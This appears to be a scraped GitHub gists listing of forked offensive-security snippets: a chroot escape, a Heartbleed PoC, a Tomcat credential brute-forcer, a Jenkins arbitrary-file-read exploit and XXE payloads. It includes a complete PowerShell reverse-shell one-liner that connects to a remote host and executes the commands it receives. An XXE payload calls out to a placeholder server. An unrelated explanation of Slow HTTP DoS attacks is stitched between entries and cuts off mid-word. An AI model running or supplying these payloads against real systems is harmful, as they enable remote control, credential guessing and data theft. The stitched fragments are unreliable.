Michael Feng 0x6b7966
@0x6b7966
0x6b7966 / ns-ipv6-no-nat.sh
Created January 21, 2022 07:25 — forked from dpino/ns-ipv6-no-nat.sh
Create Network Namespace with IPv6 connectivity via Hurricane Electric tunnel (no NAT66 needed)
#!/usr/bin/env bash
set -x
if [[ $EUID -ne 0 ]]; then
echo "You must run this script as root."
exit 1
fi
# Fill up IPv6 addresses for the veth pair. Addresses must belong to the
@0x6b7966
0x6b7966 / chroot-esc.c
Created March 17, 2021 01:46 — forked from 0xquad/chroot-esc.c
chroot jail escape methods
/*
* Simple chroot jail escape
* Copyright (c) 2015, Alexandre Hamelin <alexandre.hamelin gmail.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
@0x6b7966
0x6b7966 / powershell_reverse_shell.ps1
Created November 8, 2019 06:59 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@0x6b7966
0x6b7966 / tomcat_brute_force.py
Created November 8, 2019 06:59 — forked from egre55/tomcat_brute_force.py
tomcat_brute_force
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
@0x6b7966
0x6b7966 / hb-test.py
Created September 26, 2019 01:28 — forked from takeshixx/hb-test.py
OpenSSL heartbeat PoC with STARTTLS support.
#!/usr/bin/env python2
"""
Author: takeshix <[email protected]>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@0x6b7966
0x6b7966 / nginx-status.nse
Created September 20, 2019 14:35 — forked from johnl/nginx-status.nse
nmap script to check if a service is serving an nginx status page
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
description = [[
Detects if the service is serving an nginx status page
]]
---
import requests
import sys
import os
PLUGIN = 'credentials'
BACKDIR_COUNT = 10
if len(sys.argv) != 3:
print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]'
print ''

Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests to a web server in pieces, slowly, one piece at a time. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.

The attack exploits the fact that most modern web servers do not limit the connection duration as long as data is flowing; since a TCP connection can be prolonged virtually forever with zero or minimal data flow by manipulating the TCP receive window size, it is possible to exhaust the application's pool of concurrent connections. The possibility of prolonging a TCP connection in this way is described in several vulnerability reports: MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926.

Prerequisites for the successful attack are: - victim serve

@0x6b7966
0x6b7966 / XXE_payloads
Created July 16, 2019 04:57 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@0x6b7966
0x6b7966 / README.md
Created July 14, 2019 23:52 — forked from FrankSpierings/README.md
Linux Container Escapes and Hardening